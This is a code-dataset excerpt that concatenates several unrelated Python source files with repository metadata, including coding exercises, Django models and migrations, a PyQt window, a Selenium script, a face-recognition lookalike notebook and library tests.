for nabisco_cereal in nabisco_cereals:
name = nabisco_cereal["name"]
result[name] = cereal_ratings[name]
return result
# nabisco_cereal_ratings_end
| [
"noreply@github.com"
] | noreply@github.com |
9363952762d4ee6b82a4c8df7930a32ea9a3d38e | bf142a05b1ca81133134a0edc5c17ae5663f5674 | /raindrops/raindrops.py | e06b1130f72344e3b4017f8530c8567a6161b837 | [
"MIT"
] | permissive | brincandodecodigo/exercism-python | 3861aebe242521ac150da4ab4ac025edb83de60e | e8b85b58b95e765d0007c42f1831fb101932ba2d | refs/heads/master | 2023-08-24T23:58:32.866224 | 2020-02-10T12:53:39 | 2020-02-10T12:53:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | def convert(number):
result = ''
if has_a_factor(3, number):
result = 'Pling'
if has_a_factor(5, number):
result += 'Plang'
if has_a_factor(7, number):
result += 'Plong'
if result == '':
result = str(number)
return result
def has_a_factor(divisor, number):
return number % divisor == 0 | [
"rodolfoghi@gmail.com"
] | rodolfoghi@gmail.com |
1a7a8e09a81b8040aac3110112deebcf610eb7f1 | e5235cd85bd39f6217daad41bd36f5d21eb9453c | /crm/customers/migrations/0001_initial.py | 2441f376f23c77e88af0ea60cdf90dab06c90a14 | [] | no_license | nvkgrandhi/micro_demo | e02fa3e78a6ea0e235a26aca0b028bdaa7418ca8 | 536cbab1337f0093dc13e689f91cbb216ff30eee | refs/heads/master | 2021-01-15T10:30:16.359677 | 2016-09-22T06:55:25 | 2016-09-22T06:55:25 | 68,444,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,091 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-08-31 10:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Customers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('phone_no', models.IntegerField()),
('email', models.EmailField(max_length=254)),
('c_address', models.TextField()),
('shipping_address', models.TextField()),
('billing_address', models.TextField()),
('date_entered', models.DateTimeField()),
('c_username', models.CharField(max_length=50)),
('c_password', models.CharField(max_length=50)),
],
),
]
| [
"nvk.grandhi@gmail.com"
] | nvk.grandhi@gmail.com |
f0fe8bf81395b500283f072d2cfc7707ccbc1605 | 4904f8a7621abdf94c2024d6a7548f509795031a | /part2_lesson4_part8.py | 2b952ccca5f97acbc75938d5f92c98cee8aa10ee | [] | no_license | tagval/stepik_selenium_course | 945a0dc6539ee1dcb2616b4bdbc6615ce76eac05 | d98955b0e98a7ff9a88248206a2ece595b9040f5 | refs/heads/main | 2023-03-07T17:50:47.678212 | 2021-02-27T16:55:19 | 2021-02-27T16:55:19 | 342,903,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
import math
browser = webdriver.Chrome('C:/chromedriver/chromedriver')
browser.get("http://suninjuly.github.io/explicit_wait2.html")
price = WebDriverWait(browser, 12).until(
EC.text_to_be_present_in_element((By.ID, "price"), "100"))
button1 = browser.find_element(By.ID, "book")
button1.click()
browser.execute_script("window.scrollBy(0, 100);")
x_element = browser.find_element(By.ID,"input_value")
x = x_element.text
def calc(x):
return str(math.log(abs(12*math.sin(int(x)))))
y = calc(x)
input1 = browser.find_element(By.TAG_NAME, "input")
input1 = input1.send_keys(y)
button2 = browser.find_element(By.CSS_SELECTOR, "[type='submit']")
button2 = button2.click()
browser.quit() | [
"elanskaiavaleriia@gmail.com"
] | elanskaiavaleriia@gmail.com |
fe6afb0a5ceacf91383ce734fe45b592f58f00f9 | d05a59feee839a4af352b7ed2fd6cf10a288a3cb | /xlsxwriter/test/comparison/test_chart_axis30.py | 9e4ec252d029acea26ddf0d4218712e6c3c78c56 | [
"BSD-2-Clause-Views"
] | permissive | elessarelfstone/XlsxWriter | 0d958afd593643f990373bd4d8a32bafc0966534 | bb7b7881c7a93c89d6eaac25f12dda08d58d3046 | refs/heads/master | 2020-09-24T06:17:20.840848 | 2019-11-24T23:43:01 | 2019-11-24T23:43:01 | 225,685,272 | 1 | 0 | NOASSERTION | 2019-12-03T18:09:06 | 2019-12-03T18:09:05 | null | UTF-8 | Python | false | false | 1,350 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_axis30.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'line'})
chart.axis_ids = [69200896, 69215360]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
chart.set_x_axis({'position_axis': 'on_tick'})
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
44d8425b208455af67d6a623c4d696395a4de417 | 7a813b486667c779c9448a2a177279fabf1821d0 | /ikinciProje/QT_Elemanlari4.py | d8111a87992092d1b0f9fd6bcc1f30ea7af99c7a | [] | no_license | ilker07/pythonProjeler2 | bc1ca6882ee273f9e9317347ba0a90dff13c0797 | ece48c4bb9b13ccb5ac1b314b81a3148aa0472d1 | refs/heads/master | 2020-08-01T03:19:01.805408 | 2019-09-25T12:55:52 | 2019-09-25T12:55:52 | 210,842,979 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,567 | py |
import sys
from PyQt5.QtWidgets import *
class TabWidgetPencere(QTabWidget):
def __init__(self):
super().__init__()
self.tab1=QTabWidget() #widget da olabilir.
self.tab2=QTabWidget()
self.tab3=QTabWidget()
self.Tablo1()
self.Tablo2()
self.Tablo3()
self.addTab(self.tab1,"Bilgiler")
self.addTab(self.tab2,"Kişisel")
self.addTab(self.tab3,"Hakkında")
self.setWindowTitle("QTabWidget")
self.setTabPosition(QTabWidget.North)
self.setTabShape(QTabWidget.Triangular)
self.setTabsClosable(True)
self.setTabToolTip(0,"Bilgiler Bölümü")
self.setTabToolTip(1, "Kişisel Bölümü")
self.setTabToolTip(2, "Hakkında Bölümü")
self.setMovable(True)
self.tabCloseRequested.connect(self.kapat)
self.show()
def kapat(self, q):
self.removeTab(q)
def Kapat(self):
sender=self.sender()
self.removeTab(sender)
def Tablo1(self):
h_box=QHBoxLayout()
h_box2=QHBoxLayout()
v_bov= QVBoxLayout()
self.adLabel=QLabel("Ad: ")
self.soyadLabel=QLabel("Soyad:")
self.lineEdit1=QLineEdit()
self.lineEdit2=QLineEdit()
h_box.addWidget(self.adLabel)
h_box.addWidget(self.lineEdit1)
h_box2.addWidget(self.soyadLabel)
h_box2.addWidget(self.lineEdit2)
v_bov.addStretch()
v_bov.addLayout(h_box)
v_bov.addLayout(h_box2)
v_bov.addStretch()
self.tab1.setLayout(v_bov)
def Tablo2(self):
h_box = QHBoxLayout()
h_box2 = QHBoxLayout()
v_bov = QVBoxLayout()
self.yasLabel = QLabel("Yaş: ")
self.lineEdit1 = QSpinBox()
self.buton = QPushButton("Gönder")
h_box.addWidget(self.yasLabel)
h_box.addWidget(self.lineEdit1)
h_box2.addWidget(self.buton)
v_bov.addStretch()
v_bov.addLayout(h_box)
v_bov.addLayout(h_box2)
v_bov.addStretch()
self.tab1.setLayout(v_bov)
self.tab2.setLayout(v_bov)
def Tablo3(self):
h_box=QHBoxLayout()
self.label=QLabel()
self.label.setText("İlker Mustafa Aykut")
h_box.addWidget(self.label)
self.tab3.setLayout(h_box)
app=QApplication(sys.argv)
tab=TabWidgetPencere()
sys.exit(app.exec_())
| [
"noreply@github.com"
] | noreply@github.com |
0cb18c06d4974881f1dc288fc8f99a559cac9f83 | d48c03d5d925a3626dacf7e071fd1844165aa816 | /day2-4.py | 1f9f614cd1f7ef3e9ab3f56343e7c2fc771a0f3e | [] | no_license | Nene888/Python200804 | 2ec8ae4c304842418a09885600fe221cb4b0680d | e31364fb9f80fadb1be9f8a6aa3ccdedc11dec16 | refs/heads/master | 2022-11-25T12:46:35.115403 | 2020-08-04T08:55:10 | 2020-08-04T08:55:10 | 284,927,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 4 14:29:31 2020
@author: USER
"""
ww=['芒果','西瓜','蘋果','鳳梨']
ww.append('榴槤')
print(ww)
ww.insert(2,'檸檬')
print(ww)
ww.remove('榴槤')
print(ww) | [
"noreply@github.com"
] | noreply@github.com |
cd0aa0709e33dd26bd91d1e55facc99254e15216 | d0b6940acef2dd8ee8e37dc1034cb7e6799889f8 | /build/ur_e_description/catkin_generated/pkg.installspace.context.pc.py | eae8692e9c7a38050d6c96c32a004725305a6ce3 | [] | no_license | robwoidi/ws_MoveIt | 5477202f01e7ddd9c4bdf21187c755fe80bf6c4d | 9b004cd792193337f9f3e628ded7a63e97f85295 | refs/heads/master | 2023-07-06T01:54:24.311735 | 2021-08-08T11:57:34 | 2021-08-08T11:57:34 | 393,943,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ur_e_description"
PROJECT_SPACE_DIR = "/home/stefan/ws_moveit/install"
PROJECT_VERSION = "1.2.7"
| [
"woidi@t-online.de"
] | woidi@t-online.de |
92b993bc968fb1474af2b62d15d6c00134f51a89 | 2baa8c8b4394d2e35fa4a31064d8164bda472a33 | /natural-helpers-sematic/Dynamic Echo Chamber Code/runAll.py | 5800eef69f8cbefa5bd95cf98f48fe9bad69f3d6 | [] | no_license | ZencoderO/Code-Examples | 2c15f25ebc3596d4ea0a9350f058ea89d00e9439 | 6b4f7e649e191c68c8c2c0573057a93156b85c6c | refs/heads/main | 2023-03-25T23:23:09.647451 | 2021-03-21T04:38:58 | 2021-03-21T04:38:58 | 341,817,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | import sys
import createComunities
import proccessDataNoSciKit
import printDatNoSciKit
createComunities(sys.argv[0],sys.argv[1])
proccessDataNoSciKit()
printDatNoSciKit()
| [
"noreply@github.com"
] | noreply@github.com |
c174eeaece6b1b311b305f2b8e6aae548566a5fb | b314518eb3e33c872f880c4f80a0f3d0856cf9ee | /12_marks.py | bd31d77188a83adcb12a63ab0e53a8fd0675250c | [] | no_license | namntran/2021_python_principles | 0ba48d2cb6ff32a4fefd0b13ae24d2376e17740e | bf33210f9b0e02dfefe7a9a008936e8f47d25149 | refs/heads/main | 2023-03-10T15:47:48.930202 | 2021-02-25T07:27:53 | 2021-02-25T07:27:53 | 330,814,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | # 12_marks.py
# Prompt for and read marks for a test unit a negative number is entered.
# Print the number of marks entered and the average (arithmetic mean) of marks
# Print the highest and lowest marks
# use indefinite loop - while loop
n = 0
total = 0.0
mark = float(input("Enter a mark: ")) #initialise variables to the first value it should have, don't make up numbers
highest = mark #initialise variables to the first value it should have, don't make up numbers
lowest = mark #initialise variables to the first value it should have, don't make up numbers
while mark >= 0.0:
n += 1
total += mark
if mark > highest:
highest = mark
if mark < lowest:
lowest = mark
mark = float(input("Enter a mark: "))
print("The number of marks: ", n)
if n > 0: # only print average if n > 0
print("The average mark is: ", total/ n)
print("The lowest mark is: ", lowest)
print("The highest mark is: ", highest)
| [
"namtran78@gmail.com"
] | namtran78@gmail.com |
5081ba74faf068dafa072c75ebd968f006d2a8d4 | 7356b5b759ad072b1277470dbe9c777ff08ca22d | /Adventure/inventory.py | b7e82e37101cc696d3d8d8c52830ac8f88981146 | [] | no_license | Nmad7/A-forest-adventure | a206348c302b126598492c13a01ea52aad47533e | 9703657074f744711ed9fe3fa51c07afda829dc0 | refs/heads/master | 2021-09-01T01:05:31.512322 | 2017-12-24T01:44:04 | 2017-12-24T01:44:04 | 115,231,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,518 | py | '''
A model of an inventory
Created on Nov 20, 2017
@author: ngm7
'''
class Inventory():
'''
A class which keeps track of player inventory and allows changes to it
'''
def __init__(self):
'''
Initializes an empty inventory and item classes
'''
self.itemInventory = {'food':0,'water':0,'rope':0,'knife':0,'rifle':0,'painkiller':0,'first aid kit':0,'antibiotic':0}
#Painkiller data
self.painkiller_counter = 0
self.painkiller_active= False
self.painkiller_damage= False
def AddInventory(self,item,amount):
'''
A function that adds a certain number of items to the inventory dictionary
'''
self.itemInventory[item]=self.itemInventory[item]+amount
def SubInventory(self,item,amount=1):
'''
A function that subtracts a certain number of items to the inventory dictionary
'''
self.itemInventory[item]=self.itemInventory[item]-amount
def get_inventory_item(self,item):
'''
Returns the number of a certain item in the inventory
'''
return self.itemInventory[item]
def get_inventory(self):
'''
returns the full inventory
'''
inventory_string_display=""
for key in self.itemInventory:
inventory_string_display+= str(self.itemInventory[key])+"-"+key+"~~~"
return inventory_string_display
def in_inventory(self,item):
'''
A function that checks if an item is actually in a players inventory
returns True or False
'''
if (item in self.itemInventory) and self.get_inventory_item(item) > 0:
return True
else:
return False
def camp_meal(self):
'''FIXMEEEEEEEE (does not do what I want it to)
A function which removes one food and one water from inventory.
'''
if self.itemInventory['food'] == 0 and self.itemInventory['water']==0:
return "starving and thirsty"
elif self.itemInventory['food'] == 0:
return "starving"
elif self.itemInventory['water'] == 0:
return "thirsty"
else:
return "good"
#PAINKILLER FUNCTIONS
def painkiller_use(self,player):
'''
When a painkiller is used, a timer is set that will remove the health benefit from painkillers after a certain number of days
Also sets painkiller active to True so painkillers cannot be used again
'''
self.painkiller_counter = 2
player.health.add_health(2)
self.painkiller_active= True
def painkiller_wearoff(self,player):
'''
A function that occurs at the end of every night and checks if the painkiller counter reaches zero
'''
#Checks if counter is zero and if painkiller is active and if so gives damage
if self.painkiller_counter == 0 and self.painkiller_active == True:
player.health.take_damage(2)
self.painkiller_active=False
self.painkiller_damage=True
#If just active 1 is subtracted from the counter
elif self.painkiller_active == True:
self.painkiller_counter-=1
if __name__=="__main__":
inventory = Inventory()
print(inventory.get_inventory_item('food'))
| [
"noreply@github.com"
] | noreply@github.com |
815c29c7ac315b39685f4cb97cfe0129b2f4b029 | b2c0517a0421c32f6782d76e4df842875d6ffce5 | /Algorithms/Dynamic Programming/121. Best Time to Buy and Sell Stock.py | ebf0f3692c9e7ba74f468b736b65e900ba63d3d1 | [] | no_license | SuYuxi/yuxi | e875b1536dc4b363194d0bef7f9a5aecb5d6199a | 45ad23a47592172101072a80a90de17772491e04 | refs/heads/master | 2022-10-04T21:29:42.017462 | 2022-09-30T04:00:48 | 2022-09-30T04:00:48 | 66,703,247 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | #Forward
class Solution(object):
def maxProfit(self, prices):
if(not prices):
return 0
minP = prices[0]
maxPro = 0
for i in prices:
if(i <= minP):
minP = i
else:
maxPro = max(maxPro, i-minP)
return maxPro
#Backward
class Solution(object):
def maxProfit(self, prices):
maxP = 0
maxPro = 0
for i in prices[::-1]:
if(i > maxP):
maxP = i
else:
maxPro = max(maxPro, maxP - i)
return maxPro
#Kadane's Algorithm
#Max sum Contiguous subarray search
class Solution(object):
def maxProfit(self, prices):
L = []
for i in range(1, len(prices)):
L.append(prices[i] - prices[i-1])
maxCur = 0
maxSofar = 0
for i in L:
maxCur = max(0, maxCur + i)
maxSofar = max(maxSofar, maxCur)
return maxSofar
#Lite version
class Solution(object):
def maxProfit(self, prices):
maxCur = 0
maxSofar = 0
for i in range(1, len(prices)):
maxCur = max(0, maxCur + prices[i] - prices[i-1])
maxSofar = max(maxSofar, maxCur)
return maxSofar
| [
"soration2099@gmail.com"
] | soration2099@gmail.com |
8a680ee2aed29c19da1dff4e54875c68891b75dc | b746470138e95b56d67ecfe376c439c7de094357 | /find_your_celebrity_lookalike_with_computer_vision_594.py | a5dd79b7103bfecaf4c58df3892a3ed73dbe974d | [] | no_license | mdtahsinasif/CloudLab | aaf896990612c364a85f22a84378b193749185b9 | 601b6b3c8dd37b368390e3a2ee4dcc296541bdf2 | refs/heads/main | 2023-03-26T06:08:16.756202 | 2021-03-09T11:20:57 | 2021-03-09T11:20:57 | 330,952,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,917 | py | #!/usr/bin/env python
# coding: utf-8
# In[18]:
get_ipython().system('mkdir ../lookalikeceleb/')
# In[19]:
import face_recognition
import os
import numpy as np
from IPython.display import Image
# In[20]:
def load_images(known_images_dir):
known_encodings = []
known_images = []
for file in os.listdir(known_images_dir):
#fsdecode function decode the file into filename
filename = os.fsdecode(file)
image = face_recognition.load_image_file(os.path.join(known_images_dir, filename))
enc = face_recognition.face_encodings(image)
if len(enc) > 0:
known_encodings.append(enc[0])
known_images.append(filename)
return (known_encodings, known_images)
# In[21]:
def calculate_face_distance(known_encodings, unknown_img_path, cutoff=0.5, num_results=4):
image_to_test = face_recognition.load_image_file(unknown_img_path)
image_to_test_encoding = face_recognition.face_encodings(image_to_test)[0]
face_distances = face_recognition.face_distance(known_encodings, image_to_test_encoding)
return (unknown_img_path, known_images[face_distances.argmin()])
# In[22]:
known_encodings, known_images = load_images("/cxldata/projects/lookalikeceleb/images")
# In[23]:
original_image = "../lookalikeceleb/myimage.jpg"
Image(filename=original_image)
# In[16]:
matching_image = calculate_face_distance(known_encodings, original_image)[1]
# In[17]:
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from matplotlib import rcParams
get_ipython().run_line_magic('matplotlib', 'inline')
# read images
img_1 = mpimg.imread(original_image)
img_2 = mpimg.imread('/cxldata/projects/lookalikeceleb/images/' + matching_image)
# display images
fig, ax = plt.subplots(1,2)
ax[0].imshow(img_1);
ax[1].imshow(img_2);
print('Hey, you look like ' + os.path.splitext(matching_image)[0] + '!')
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
d84cdd667cd99b39e7bb85cdc640ce9d2da56e13 | ee7abc2f88faf56699197732bf215fd0b1c0d992 | /18.LocalChat/vd/vd2.py | 59d273191d294a28fa1951d649768a8493d74df9 | [] | no_license | hntvinh90/python_project | 4bd2256885ff2efc48f7c35959a3f05ba507c2c8 | 489da9cd309f79d56a020334ce5a80480e678b70 | refs/heads/master | 2020-04-25T19:10:14.350978 | 2019-02-28T16:53:49 | 2019-02-28T16:53:49 | 173,009,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | #!/usr/bin/python
""""""
def main():
return True
if __name__ == '__main__':
main()
'''
'''
'asdas'
| [
"honguyenthanhvinh@gmail.com"
] | honguyenthanhvinh@gmail.com |
e86d67f32b9eade3829748ae16ebc5608042241f | f791462fb1286607d16459c1602d133f8d8c8b59 | /test/test_distributions_mixture.py | a1ab093e65ea5c73f333d6fcd898c35cb3340e73 | [
"Apache-2.0"
] | permissive | pyro-ppl/numpyro | b071ed2bd93be41bafc3da8764c9f5617f996d92 | ca96eca8e8e1531e71ba559ef7a8ad3b4b68cbc2 | refs/heads/master | 2023-09-03T15:56:13.252692 | 2023-08-28T14:32:25 | 2023-08-28T14:32:25 | 170,580,540 | 1,941 | 219 | Apache-2.0 | 2023-09-04T11:26:11 | 2019-02-13T21:13:59 | Python | UTF-8 | Python | false | false | 5,161 | py | # Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import pytest
import jax
import jax.numpy as jnp
import numpyro.distributions as dist
rng_key = jax.random.PRNGKey(42)
def get_normal(batch_shape):
"""Get parameterized Normal with given batch shape."""
loc = jnp.zeros(batch_shape)
scale = jnp.ones(batch_shape)
normal = dist.Normal(loc=loc, scale=scale)
return normal
def get_mvn(batch_shape):
"""Get parameterized MultivariateNormal with given batch shape."""
dimensions = 2
loc = jnp.zeros((*batch_shape, dimensions))
cov_matrix = jnp.eye(dimensions, dimensions)
for i, s in enumerate(batch_shape):
loc = jnp.repeat(jnp.expand_dims(loc, i), s, axis=i)
cov_matrix = jnp.repeat(jnp.expand_dims(cov_matrix, i), s, axis=i)
mvn = dist.MultivariateNormal(loc=loc, covariance_matrix=cov_matrix)
return mvn
@pytest.mark.parametrize("jax_dist_getter", [get_normal, get_mvn])
@pytest.mark.parametrize("nb_mixtures", [1, 3])
@pytest.mark.parametrize("batch_shape", [(), (1,), (7,), (2, 5)])
@pytest.mark.parametrize("same_family", [True, False])
def test_mixture_same_batch_shape(
jax_dist_getter, nb_mixtures, batch_shape, same_family
):
mixing_probabilities = jnp.ones(nb_mixtures) / nb_mixtures
for i, s in enumerate(batch_shape):
mixing_probabilities = jnp.repeat(
jnp.expand_dims(mixing_probabilities, i), s, axis=i
)
assert jnp.allclose(mixing_probabilities.sum(axis=-1), 1.0)
mixing_distribution = dist.Categorical(probs=mixing_probabilities)
if same_family:
component_distribution = jax_dist_getter((*batch_shape, nb_mixtures))
else:
component_distribution = [
jax_dist_getter(batch_shape) for _ in range(nb_mixtures)
]
_test_mixture(mixing_distribution, component_distribution)
@pytest.mark.parametrize("jax_dist_getter", [get_normal, get_mvn])
@pytest.mark.parametrize("nb_mixtures", [3])
@pytest.mark.parametrize("mixing_batch_shape, component_batch_shape", [[(2,), (7, 2)]])
@pytest.mark.parametrize("same_family", [True, False])
def test_mixture_broadcast_batch_shape(
jax_dist_getter, nb_mixtures, mixing_batch_shape, component_batch_shape, same_family
):
# Create mixture
mixing_probabilities = jnp.ones(nb_mixtures) / nb_mixtures
for i, s in enumerate(mixing_batch_shape):
mixing_probabilities = jnp.repeat(
jnp.expand_dims(mixing_probabilities, i), s, axis=i
)
assert jnp.allclose(mixing_probabilities.sum(axis=-1), 1.0)
mixing_distribution = dist.Categorical(probs=mixing_probabilities)
if same_family:
component_distribution = jax_dist_getter((*component_batch_shape, nb_mixtures))
else:
component_distribution = [
jax_dist_getter(component_batch_shape) for _ in range(nb_mixtures)
]
_test_mixture(mixing_distribution, component_distribution)
def _test_mixture(mixing_distribution, component_distribution):
# Create mixture
mixture = dist.Mixture(
mixing_distribution=mixing_distribution,
component_distributions=component_distribution,
)
assert (
mixture.mixture_size == mixing_distribution.probs.shape[-1]
), "Mixture size needs to be the size of the probability vector"
if isinstance(component_distribution, dist.Distribution):
assert (
mixture.batch_shape == component_distribution.batch_shape[:-1]
), "Mixture batch shape needs to be the component batch shape without the mixture dimension."
else:
assert (
mixture.batch_shape == component_distribution[0].batch_shape
), "Mixture batch shape needs to be the component batch shape."
# Test samples
sample_shape = (11,)
# Samples from component distribution(s)
component_samples = mixture.component_sample(rng_key, sample_shape)
assert component_samples.shape == (
*sample_shape,
*mixture.batch_shape,
mixture.mixture_size,
*mixture.event_shape,
)
# Samples from mixture
samples = mixture.sample(rng_key, sample_shape=sample_shape)
assert samples.shape == (*sample_shape, *mixture.batch_shape, *mixture.event_shape)
# Check log_prob
lp = mixture.log_prob(samples)
nb_value_dims = len(samples.shape) - mixture.event_dim
expected_shape = samples.shape[:nb_value_dims]
assert lp.shape == expected_shape
# Samples with indices
samples_, [indices] = mixture.sample_with_intermediates(
rng_key, sample_shape=sample_shape
)
assert samples_.shape == samples.shape
assert indices.shape == (*sample_shape, *mixture.batch_shape)
assert jnp.issubdtype(indices.dtype, jnp.integer)
assert (indices >= 0).all() and (indices < mixture.mixture_size).all()
# Check mean
mean = mixture.mean
assert mean.shape == mixture.shape()
# Check variance
var = mixture.variance
assert var.shape == mixture.shape()
# Check cdf
if mixture.event_shape == ():
cdf = mixture.cdf(samples)
assert cdf.shape == (*sample_shape, *mixture.shape())
| [
"noreply@github.com"
] | noreply@github.com |
678afcc0724c6f5ef1b5f4ed3a8f9fc6b59d5a11 | 26418ec10db11fcce0acdaaef8b01ff7576f5584 | /secondproject/urls.py | 4d799338e0d990f74b918fe015e57b9052b3f188 | [] | no_license | yeeunee/real_blog | bc949e04aa84023e8d53d1f60450ea38520c2806 | 1487054a87ac215b5ef13e0ab5ad6f1d2b84e6ef | refs/heads/master | 2020-04-28T15:04:03.569158 | 2019-03-13T06:21:26 | 2019-03-13T06:21:26 | 175,358,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | """secondproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import blog.views
urlpatterns = [
path('admin/', admin.site.urls),
path('', blog.views.home, name="home"),
]
| [
"sentirector@gmail.com"
] | sentirector@gmail.com |
9681b96bcbfa23482456f66a61a1679fa4b8b4c4 | a2ecfcd9f51c00b8836c0357f6b7b8482733e544 | /src/finetune_scripts/transformer_models.py | c40fda94ee5c5029f05bbcdb29e1b584df410598 | [] | no_license | Enniwhere/airbnb-sentiment-vis | 03e98787a21a11ef819f740981b4edd17b2ad0ae | 09a415061112e9c69675f1181902906e31e430de | refs/heads/master | 2021-05-20T02:03:00.421021 | 2020-04-20T08:59:48 | 2020-04-20T08:59:48 | 252,139,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a84bdd75aacb61d69f63c11f9c449eef2bd07881c00fddb82d76e7ca98bf5b7b
size 3802
| [
"enni@cs.au.dk"
] | enni@cs.au.dk |
0cfe6683a4fd0a381b62f6da4647e3531099d53e | f1bc74572c5e93d3a8d40aaec47f36af7dfba2ee | /prototype/Tuna/myvenv/Scripts/django-admin.py | de343c74f429c717d2d4c1fb2a0d80ab273a088d | [] | no_license | jbnulastproject/ant_front | d0f85a3b203a05a6a40fb9b804206baf0f9ad8f5 | 379b41a3c1246648ad6faa2fad6b8df83dc4f6c5 | refs/heads/master | 2020-11-30T12:26:06.176588 | 2019-12-29T13:10:19 | 2019-12-29T13:10:19 | 230,396,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | #!c:\users\user\desktop\ant_front\prototype\tuna\myvenv\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"rudals901@gmail.com"
] | rudals901@gmail.com |
1de8c0a0efc4e8cbd1f338c8f43f5c4b19e5dc87 | 0ccede4589d755393f28f48d9ee3e4e1f95cb68c | /django/django_fullstack/Favorite_Books/favbook_app/models.py | 2255b73353fc6d9e77c06a59f55f64da64eeb306 | [] | no_license | mezoswn/python-stack | 766caa92a13160dab9a3649ffffb26375735715c | e12e82bc3aaaaa0e9cb4314da3c391006c7e08fc | refs/heads/master | 2023-05-08T00:24:02.863567 | 2021-05-31T01:59:53 | 2021-05-31T01:59:53 | 364,519,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,961 | py | from django.db import models
from time import localtime, strftime
import re
from django.db.models.deletion import CASCADE
class BlogManager(models.Manager):
def basic_validator(self, postData):
errors = {}
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
lisOfEmails = User.objects.filter(email=postData['email'])
if not EMAIL_REGEX.match(postData['email']): # test whether a field matches the pattern
errors['email'] = "Invalid email address!"
if len(lisOfEmails):
errors['email'] = "Email is already registered"
# add keys and values to errors dictionary for each invalid fieldcopy
if len(postData['firstname']) < 2:
errors["firstname"] = "User first should be at least 2 characters"
if len(postData['lastname']) < 2:
errors["lastname"] = "User Last name should be at least 2 characters"
if len(postData['passwd']) < 8:
errors["passwd"] = "User Password should be at least 8 characters"
todayTime= strftime("%Y-%m-%d", localtime())
postTime = postData['birth_date']
todayTimeList = todayTime.split("-")
postTimeList = postTime.split("-")
if (todayTimeList[0] <= postTimeList[0]):
if (todayTimeList[1] <= postTimeList[1]):
if (todayTimeList[2] < postTimeList[2]):
errors["birth_date"] = "You are not born yet!!!"
if postTime:
todayTimeAge = int(todayTimeList[0]) + int(todayTimeList[1]) + int(todayTimeList[2])
postTimeAge = int(postTimeList[0]) + int(postTimeList[1]) + int(postTimeList[2])
age = todayTimeAge - postTimeAge
if age < 13:
errors["Age"] = "Sorry Your Age less than 13 !"+str(age)
return errors
def login_Validator(self,postData):
errors2={}
if len(postData['loginemail']) == 0 :
errors2["loginemail"] = "Please enter Valid email or Password to login "
if len(postData['loginpass']) == 0:
errors2["loginpass"] = "Please enter Valid email or Password to login "
lisOfEmails = User.objects.filter(email=postData['loginemail'])
lisOfPassword = User.objects.filter(passwod=postData['loginpass'])
return errors2
class User(models.Model):
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField(max_length=255)
passwod = models.CharField(max_length=255)
dateOfBirth = models.DateField(null=True, verbose_name='Date of Birth')
